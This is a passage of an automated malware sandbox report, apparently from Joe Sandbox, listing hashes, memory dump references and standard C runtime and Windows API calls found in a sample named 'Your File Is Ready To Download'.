        • Opcode Fuzzy Hash: 5bb09631857f851e105238e40bf99053055f517b5dbf2f00cf5b28b2874e967c
        • Instruction Fuzzy Hash: AE01A272F0931DAAEB207BB49C07BDE3B789F80765F204018F114A60D2CF3485D19A95
        APIs
        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0091661F
        • __isleadbyte_l.LIBCMT ref: 00916653
        • MultiByteToWideChar.KERNEL32(?,00000009,?,?,?,00000000,?,?,?,00000040,?,?), ref: 00916684
        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,?,?,?,00000040,?,?), ref: 009166F2
        Memory Dump Source
        • Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
        • Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd
        Similarity
        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
        • String ID:
        • API String ID: 3058430110-0
        • Opcode ID: 58a7d5b092679ae94ac68bcbbf694493f2c47df146548072c8f3e28d3e3328ad
        • Instruction ID: fb9b7fc89c7848ce1cebdd2ba519838ce6065a1cafaf50d553352905920e04a2
        • Opcode Fuzzy Hash: 58a7d5b092679ae94ac68bcbbf694493f2c47df146548072c8f3e28d3e3328ad
        • Instruction Fuzzy Hash: C831CE31F0024EEFCB20DF64C880AEE7BA9BF41391F188569E4669B191D730DD90DB50
        APIs
        • __getptd.LIBCMT ref: 009161C8
          • Part of subcall function 009145D4: __getptd_noexit.LIBCMT ref: 009145D7
          • Part of subcall function 009145D4: __amsg_exit.LIBCMT ref: 009145E4
        • __getptd.LIBCMT ref: 009161DF
        • __amsg_exit.LIBCMT ref: 009161ED
        • __lock.LIBCMT ref: 009161FD
        Memory Dump Source
        • Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
        • Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd
        Similarity
        • API ID: __amsg_exit__getptd$__getptd_noexit__lock
        • String ID:
        • API String ID: 3521780317-0
        • Opcode ID: e91a2d10f765db18d2968afcc1b1136c8e3cd43c139460a2c7fe67de82f7beba
        • Instruction ID: d911073738e30d107e030956b437e3e1fb23285d412976bc82f4d2036e5880db
        • Opcode Fuzzy Hash: e91a2d10f765db18d2968afcc1b1136c8e3cd43c139460a2c7fe67de82f7beba
        • Instruction Fuzzy Hash: 7DF09032F5930CABE720FBA89806BC937A06F84720F004169F45097292CB74A9C0DB91